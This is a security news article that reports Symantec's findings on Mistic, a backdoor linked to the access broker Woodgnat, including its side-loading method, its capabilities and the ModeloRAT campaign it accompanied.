A relatively new backdoor called Mistic has been deployed in multiple attacks since April 2026 targeting organizations in the insurance, education, IT, and professional services sectors, according to Symantec.
The malware appears to be associated with Woodgnat, also known as KongTuke, a financially motivated initial access broker (IAB) active since at least May 2024 that has been connected to ransomware operations including Qilin, Interlock, Rhysida, Akira, 8Base, and Black Basta.
“Woodgnat reportedly functions primarily as an IAB. Its goal is not to deliver the final payload, but to establish highly durable remote access within an enterprise and sell this high-level access to ransomware affiliates and other attackers for a fee,” the researchers said.
Earlier this month, Zscaler documented the backdoor under the name MLTBackdoor.
In one intrusion, researchers observed Mistic deployed alongside ModeloRAT, a Python-based remote access trojan developed by Woodgnat.
Huntress first reported on ModeloRAT in January 2026 during an investigation into a ClickFix campaign dubbed CrashFix. The campaign used a malicious Chrome extension named NexShield, disguised as an ad blocker, to intentionally crash victims’ browsers and trick them into running PowerShell commands that led to the deployment of ModeloRAT.
“Mistic was side-loaded through MpExtMs.exe, a legitimate file, and loaded from a DLL named EndpointDlp.dll, a name associated with Microsoft endpoint-security tooling. This would help the backdoor blend in with trusted software,” researchers noted.
Attackers also loaded a .NET DLL on the victim network that displayed a fake login screen and stole credentials entered by users.
Once installed, Mistic communicates with its command-and-control infrastructure and receives instructions from the operator.
Its capabilities include uploading, downloading, moving, renaming, and deleting files, creating folders, modifying how frequently it checks for commands, executing code received from the command-and-control server directly in memory, and terminating and removing itself from an infected system.
“The fact that Mistic executes in memory and also has a kill switch built in means that it is very stealthy, potentially allowing for long-term access for attackers,” they added.
In addition to Mistic and ModeloRAT, the attackers used several legitimate tools, including Curl, Reg.exe, Net.exe, PowerShell, Certutil, and WMIC (Windows Management Instrumentation). These utilities can be used to download files, execute commands, modify the Windows registry, gather information about a system, and interact with remote hosts.
Woodgnat’s victim selection is “largely opportunistic,” Symantec said, adding that the group’s geographic location remains unknown.
Symantec has published a list of indicators of compromise for Mistic, along with malicious files and IP addresses used in the recent Woodgnat attacks.
